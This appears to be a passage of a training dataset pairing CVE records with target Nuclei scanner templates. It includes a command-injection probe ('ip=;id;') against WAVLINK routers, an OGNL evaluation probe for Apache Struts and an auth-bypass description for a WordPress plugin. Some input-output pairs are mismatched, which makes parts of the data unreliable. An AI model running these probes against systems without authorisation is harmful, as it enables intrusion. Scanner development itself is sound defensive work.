"cve2019",
"sharepoint",
"microsoft",
"rce",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2014-0160",
"severity": "high",
"tags": [
"cve",
"cve2014",
"openssl",
"heartbleed",
"code",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html",
"snippet": "PoC available at http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html"
},
{
"source": "nvd",
"url": "http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html",
"snippet": "PoC available at http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2019-0230",
"info": {
"name": "Apache Struts <=2.5.20 - Remote Code Execution",
"author": "geeknik",
"severity": "critical",
"description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation when evaluated on raw user input in tag attributes, which may lead to remote code execution.",
"tags": [
"cve",
"cve2019",
"tenable",
"packetstorm",
"struts",
"rce",
"apache",
"vuln"
],
"reference": [
"https://nvd.nist.gov/vuln/detail/CVE-2019-0230",
"https://cwiki.apache.org/confluence/display/WW/S2-059",
"https://www.tenable.com/blog/cve-2019-0230-apache-struts-potential-remote-code-execution-vulnerability",
"http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html",
"https://cwiki.apache.org/confluence/display/ww/s2-059"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/?id={{str}}%25{128*128}"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"{{str}}16384"
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2019-0230",
"timestamp": "2025-11-13T15:15:41.599532Z"
}
}
|
graphql-apollo-detect
|
[CANONICAL_RECORD]
{
"cve_id": "graphql-apollo-detect",
"summary": "Graphql Apollo Detect. This template detects Graphql Apollo Detect by checking specific patterns and responses.",
"affected_products": [],
"paths": [
"{{BaseURL}}/graphql",
"{{BaseURL}}/api/graphql",
"{{BaseURL}}/query"
],
"indicators": [
"Directive \"@skip\" argument \"if\" of type \"Boolean!\" is required, but it was not provided.",
"Content-Type: text/html",
"<html",
"<body"
],
"severity_hint": "info"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "alibaba-cloud-code-env",
"severity": "info",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "graphql-apollo-detect",
"info": {
"name": "Graphql Apollo Detect",
"author": "princechaddha",
"severity": "info",
"description": "Graphql Apollo Detect",
"tags": [
"tech",
"graphql",
"apollo"
],
"reference": [
"https://github.com/dolevf/graphw00f/blob/main/graphw00f/lib.py"
]
},
"requests": [
{
"method": "POST",
"path": [
"{{BaseURL}}/graphql",
"{{BaseURL}}/api/graphql",
"{{BaseURL}}/query",
"{{BaseURL}}/"
],
"matchers": [
{
"type": "status",
"status": [
200
]
},
{
"type": "word",
"part": "body",
"words": [
"Directive \"@skip\" argument \"if\" of type \"Boolean!\" is required, but it was not provided."
]
},
{
"type": "word",
"part": "header",
"words": [
"Content-Type: text/html"
],
"negative": true
},
{
"type": "word",
"part": "body",
"words": [
"<html",
"<body"
],
"condition": "or",
"negative": true
}
],
"headers": {
"Content-Type": "application/json"
},
"body": "{\"query\":\"query @skip {__typename}\"}",
"matchers_condition": "and",
"max_redirects": 1
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-graphql-apollo-detect",
"timestamp": "2025-11-13T15:15:53.240023Z"
}
}
|
CVE-2025-34077
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2025-34077",
"summary": "An authentication bypass vulnerability exists in the WordPress Pie Register plugin \u2264 3.7.1.4 that allows unauthenticated attackers to impersonate arbitrary users by submitting a crafted POST request to the login endpoint. By setting social_site=true and manipulating the user_id_social_site parameter, an attacker can generate a valid WordPress session cookie for any user ID, including administrators. Once authenticated, the attacker may exploit plugin upload functionality to install a malicious plugin containing arbitrary PHP code, resulting in remote code execution on the underlying server.",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
},
{
"id": "cve-2025-1974-k8s",
"severity": "critical",
"tags": [
"cve",
"cve2025",
"cloud",
"devops",
"kubernetes",
"ingress",
"nginx",
"k8s",
"k8s-cluster-security"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2025-34077",
"info": {
"name": "WordPress Pie Register <= 3.7.1.4 - Authentication Bypass",
"author": "kylew1004",
"severity": "critical",
"description": "An authentication bypass vulnerability exists in the WordPress Pie Register plugin \u2264 3.7.1.4 that allows unauthenticated attackers to impersonate arbitrary users by submitting a crafted POST request to the login endpoint. By setting social_site=true and manipulating the user_id_social_site parameter, an attacker can generate a valid WordPress session cookie for any user ID, including administrators.Once authenticated, the attacker may exploit plugin upload functionality to install a malicious plugin containing arbitrary PHP code, resulting in remote code execution on the underlying server.\n",
"tags": [
"cve",
"cve2025",
"wordpress",
"wp-plugin",
"pie-register",
"wp",
"auth-bypass",
"vuln"
],
"reference": [
"https://github.com/MrjHaxcore/CVE-2025-34077",
"https://nvd.nist.gov/vuln/detail/CVE-2025-34077",
"https://securityvulnerability.io/vulnerability/CVE-2025-34077"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "dsl",
"dsl": [
"contains(set_cookie,'wordpress_logged_in_')",
"status_code==302"
],
"condition": "and"
}
]
},
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "dsl",
"dsl": [
"status_code == 200",
"contains_all(body, \"Dashboard\",\"Plugins\",\"Edit Profile\")"
],
"condition": "and"
}
],
"max_redirects": 1
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 2,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2025-34077",
"timestamp": "2025-11-13T15:15:47.431972Z"
}
}
|
CWE-200
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-200",
"summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "dns-waf-detect",
"severity": "info",
"tags": [
"tech",
"waf",
"dns",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "elasticbeanstalk-takeover",
"severity": "high",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "fbi-seized-nameserver",
"severity": "info",
"tags": [
"dns",
"ns",
"darkweb",
"fbi",
"seized",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "flipboard",
"info": {
"name": "Flipboard User Name Information - Detect",
"author": "dwisiswant0",
"severity": "info",
"description": "Flipboard user name information check was conducted.",
"tags": [
"osint",
"osint-tech",
"flipboard",
"discovery"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"https://flipboard.com/@{{user}}"
],
"matchers": [
{
"type": "status",
"status": [
200
]
},
{
"type": "word",
"part": "body",
"words": [
") on Flipboard"
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-flipboard",
"timestamp": "2025-11-13T15:15:51.783989Z"
}
}
|
cloudfront-traffic-unencrypted
|
[CANONICAL_RECORD]
{
"cve_id": "cloudfront-traffic-unencrypted",
"summary": "Ensure that the communication between your Amazon CloudFront distributions and their custom origins is encrypted using HTTPS in order to secure the delivery of your web content and fulfill compliance requirements for encryption in transit.\n",
"affected_products": [],
"paths": [],
"indicators": [
"CloudFront Traffic To Origin Unencrypted",
"detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-cloud-monitor-disable",
"severity": "medium",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cloudfront-traffic-unencrypted",
"info": {
"name": "CloudFront Traffic To Origin Unencrypted",
"author": "DhiyaneshDK",
"severity": "medium",
"description": "Ensure that the communication between your Amazon CloudFront distributions and their custom origins is encrypted using HTTPS in order to secure the delivery of your web content and fulfill compliance requirements for encryption in transit.\n",
"tags": [
"cloud",
"devops",
"aws",
"amazon",
"cloudfront",
"aws-cloud-config"
],
"reference": [
"https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-traffic-to-origin-unencrypted.html",
"http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/SecureConnections.html"
]
},
"requests": [
{
"method": "GET",
"path": [
"/"
],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-cloudfront-traffic-unencrypted",
"timestamp": "2025-11-13T15:15:37.806762Z"
}
}
|
CVE-2021-25281
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2021-25281",
"summary": "An issue was discovered in through SaltStack Salt before 3002.5. salt-api does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master.",
"affected_products": [
{
"vendor": "saltstack",
"product": "salt",
"version_range": "< 2015.8.10"
},
{
"vendor": "fedoraproject",
"product": "fedora",
"version_range": "*"
},
{
"vendor": "debian",
"product": "debian_linux",
"version_range": "*"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "critical"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2019-0604",
"severity": "critical",
"tags": [
"cve",
"cve2019",
"sharepoint",
"microsoft",
"rce",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2020-0646",
"severity": "critical",
"tags": [
"cve",
"cve2020",
"net-framework",
"sharepoint",
"microsoft",
"packetstorm",
"rce",
"kev",
"oast",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "http://packetstormsecurity.com/files/162058/SaltStack-Salt-API-Unauthenticated-Remote-Command-Execution.html",
"snippet": "PoC available at http://packetstormsecurity.com/files/162058/SaltStack-Salt-API-Unauthenticated-Remote-Command-Execution.html"
},
{
"source": "nvd",
"url": "https://github.com/saltstack/salt/releases",
"snippet": "PoC available at https://github.com/saltstack/salt/releases"
},
{
"source": "nvd",
"url": "https://lists.debian.org/debian-lts-announce/2021/11/msg00009.html",
"snippet": "PoC available at https://lists.debian.org/debian-lts-announce/2021/11/msg00009.html"
},
{
"source": "nvd",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7GRVZ5WAEI3XFN2BDTL6DDXFS5HYSDVB/",
"snippet": "PoC available at https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7GRVZ5WAEI3XFN2BDTL6DDXFS5HYSDVB/"
},
{
"source": "nvd",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FUGLOJ6NXLCIFRD2JTXBYQEMAEF2B6XH/",
"snippet": "PoC available at https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FUGLOJ6NXLCIFRD2JTXBYQEMAEF2B6XH/"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2021-25281",
"info": {
"name": "SaltStack Salt <3002.5 - Auth Bypass",
"author": "madrobot",
"severity": "critical",
"description": "SaltStack Salt before 3002.5 does not honor eauth credentials for the wheel_async client, allowing attackers to remotely run any wheel modules on the master.",
"tags": [
"cve",
"cve2021",
"saltapi",
"rce",
"saltstack",
"unauth",
"vuln"
],
"reference": [
"http://hackdig.com/02/hack-283902.htm",
"https://dozer.nz/posts/saltapi-vulns",
"https://nvd.nist.gov/vuln/detail/CVE-2021-25281",
"https://github.com/saltstack/salt/releases",
"https://www.saltstack.com/blog/active-saltstack-cve-announced-2021-jan-21/"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"return",
"tag",
"jid",
"salt",
"wheel"
],
"condition": "and"
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2021-25281",
"timestamp": "2025-11-13T15:15:43.038778Z"
}
}
|
CWE-200
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-200",
"summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "elasticbeanstalk-takeover",
"severity": "high",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "fbi-seized-nameserver",
"severity": "info",
"tags": [
"dns",
"ns",
"darkweb",
"fbi",
"seized",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "detect-dangling-cname",
"severity": "info",
"tags": [
"dns",
"takeover",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "webeditors-check-detect",
"info": {
"name": "Web Editor Check - Detect",
"author": "princechaddha,bernardofsr,gy741",
"severity": "info",
"description": "Multiple web editor checks were detected.",
"tags": [
"panel",
"webeditors",
"ckeditor",
"discovery"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}{{paths}}"
],
"matchers": [
{
"type": "word",
"words": [
"<title>FCKeditor",
"<title>CKEditor Samples</title>",
"http://ckeditor.com</a>",
"Custom Uploader URL:",
"init_spell()",
"'tip':'",
":: Smart Editor 2",
"Replace Textareas by Class Name",
"CKEditor - The text editor for the Internet"
],
"condition": "or"
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-webeditors-check-detect",
"timestamp": "2025-11-13T15:15:49.463063Z"
}
}
|
CVE-2020-12124
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2020-12124",
"summary": "A remote command-line injection vulnerability in the /cgi-bin/live_api.cgi endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to execute arbitrary Linux commands as root without authentication.",
"affected_products": [
{
"vendor": "wavlink",
"product": "wn530h4_firmware",
"version_range": "*"
}
],
"paths": [
"/cgi-bin/live_api.cgi"
],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "critical"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2020-0646",
"severity": "critical",
"tags": [
"cve",
"cve2020",
"net-framework",
"sharepoint",
"microsoft",
"packetstorm",
"rce",
"kev",
"oast",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
},
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "https://cerne.xyz/bugs/CVE-2020-12124",
"snippet": "PoC available at https://cerne.xyz/bugs/CVE-2020-12124"
},
{
"source": "nvd",
"url": "https://cerne.xyz/bugs/CVE-2020-12124",
"snippet": "PoC available at https://cerne.xyz/bugs/CVE-2020-12124"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2020-12124",
"info": {
"name": "WAVLINK WN530H4 live_api.cgi - Command Injection",
"author": "DhiyaneshDK",
"severity": "critical",
"description": "A remote command-line injection vulnerability in the /cgi-bin/live_api.cgi endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to execute arbitrary Linux commands as root without authentication.\n",
"tags": [
"cve",
"cve2020",
"rce",
"wavlink",
"vkev",
"vuln"
],
"reference": [
"https://github.com/db44k/CVE-2020-12124",
"https://cerne.xyz/bugs/CVE-2020-12124",
"https://www.wavlink.com/en_us/product/WL-WN530H4.html",
"https://github.com/Scorpion-Security-Labs/CVE-2020-12124"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/cgi-bin/live_api.cgi?page={{str}}&id={{num}}&ip=;id;"
],
"matchers": [
{
"type": "regex",
"part": "body",
"regex": [
"((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
]
},
{
"type": "word",
"part": "body",
"words": [
"WiFiBand"
]
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2020-12124",
"timestamp": "2025-11-13T15:15:42.165875Z"
}
}
|
CVE-2024-51567
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2024-51567",
"summary": "upgrademysqlstatus in databases/views.py in CyberPanel (aka Cyber Panel) before 5b08cd6 allows remote attackers to bypass authentication and execute arbitrary commands via /dataBases/upgrademysqlstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected.",
"affected_products": [
{
"vendor": "cyberpanel",
"product": "cyberpanel",
"version_range": "< 2.3.8"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "critical"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
},
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2023-4911",
"severity": "high",
"tags": [
"cve",
"cve2023",
"code",
"glibc",
"looneytunables",
"linux",
"privesc",
"local",
"kev",
"gnu",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "https://cwe.mitre.org/data/definitions/420.html",
"snippet": "PoC available at https://cwe.mitre.org/data/definitions/420.html"
},
{
"source": "nvd",
"url": "https://cwe.mitre.org/data/definitions/78.html",
"snippet": "PoC available at https://cwe.mitre.org/data/definitions/78.html"
},
{
"source": "nvd",
"url": "https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce",
"snippet": "PoC available at https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2024-51567",
"info": {
"name": "CyberPanel v2.3.6 Pre-Auth Remote Code Execution",
"author": "DhiyaneshDK",
"severity": "critical",
"description": "upgrademysqlstatus in databases/views.py in CyberPanel (aka Cyber Panel) before 5b08cd6 allows remote attackers to bypass authentication and execute arbitrary commands via /dataBases/upgrademysqlstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected.\n",
"tags": [
"cve",
"cve2024",
"cyberpanel",
"rce",
"intrusive",
"kev",
"vkev",
"vuln"
],
"reference": [
"https://community.cyberpanel.net/t/cyberpanel-2-1-remote-code-execution-rce/31760",
"https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce",
"https://cwe.mitre.org/data/definitions/420.html",
"https://cwe.mitre.org/data/definitions/78.html",
"https://cyberpanel.net/KnowledgeBase/home/change-logs/"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"uid=",
"error_message",
"requestStatus"
],
"condition": "and"
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2024-51567",
"timestamp": "2025-11-13T15:15:46.968370Z"
}
}
|
CWE-200
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-200",
"summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "spoofable-spf-records-ptr",
"severity": "info",
"tags": [
"dns",
"spf",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
